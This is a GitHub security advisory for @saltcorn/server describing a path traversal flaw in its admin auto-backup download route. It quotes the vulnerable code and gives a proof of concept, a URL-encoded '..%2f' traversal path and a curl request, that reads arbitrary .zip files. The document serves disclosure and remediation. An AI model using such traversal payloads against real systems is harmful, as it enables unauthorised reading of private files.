logo

Advisories

Weaknesses

Fixes

Requirements

Compliance

GHSA-277h-px4m-62q8 @saltcorn/server

Package

Manager: npm
Name: @saltcorn/server
Vulnerable Version: >=0 <1.0.0-beta.14

Severity

Level: Medium

CVSS v3.1: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P

EPSS: N/A pctlN/A

Details

@saltcorn/server arbitrary file zip read and download when downloading auto backups ### Summary A user with admin permission can read and download arbitrary zip files when downloading auto backups. The file name used to identify the zip file is not properly sanitized when passed to `res.download` API. ### Details - file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/routes/admin.js#L671-L682 ```js router.get( "/auto-backup-download/:filename", isAdmin, error_catcher(async (req, res) => { const { filename } = req.params; // [1] source [...] if ( !isRoot || !(filename.startsWith(backup_file_prefix) && filename.endsWith(".zip")) // [2] ) { res.redirect("/admin/backup"); return; } const auto_backup_directory = getState().getConfig("auto_backup_directory"); res.download(path.join(auto_backup_directory, filename), filename); // [3] sink }) ); ``` ### Steps to reproduce (PoC) - create a file with `.zip` extension under `/tmp` folder: ``` echo "secret12345" > /tmp/secret.zip ``` - log into the application as an admin user - visit the url `http://localhost:3000/admin/auto-backup-download/sc-backup-%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftmp%2fsecret.zip` - download the zip file and then check if the zip was indeed downloaded: ```bash cat secret.zip secret12345 ``` - Alternatively send the following request to retrieve the file just created. ```bash curl -i -X $'GET' \ -H $'Host: localhost:3000' \ -H $'Connection: close' \ -b $'connect.sid=VALID_CONNECT_SID_COOKIE' \ $'http://localhost:3000/admin/auto-backup-download/sc-backup-%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftmp%2fsecret.zip' ``` **NOTE**: To obtain a valid `connect.sid` cookie, just open the developer console while logged and retrieve the cookie value. ### Impact Arbitrary zip files download (information disclosure). ### Recommended Mitigation Resolve the `filename` parameter before checking if it starts with `backup_file_prefix` .

Metadata

Created: 2024-10-03T19:46:12Z
Modified: 2024-10-03T19:46:12Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/10/GHSA-277h-px4m-62q8/GHSA-277h-px4m-62q8.json
CWE IDs: ["CWE-22"]
Alternative ID: N/A
Finding: F063
Auto approve: 1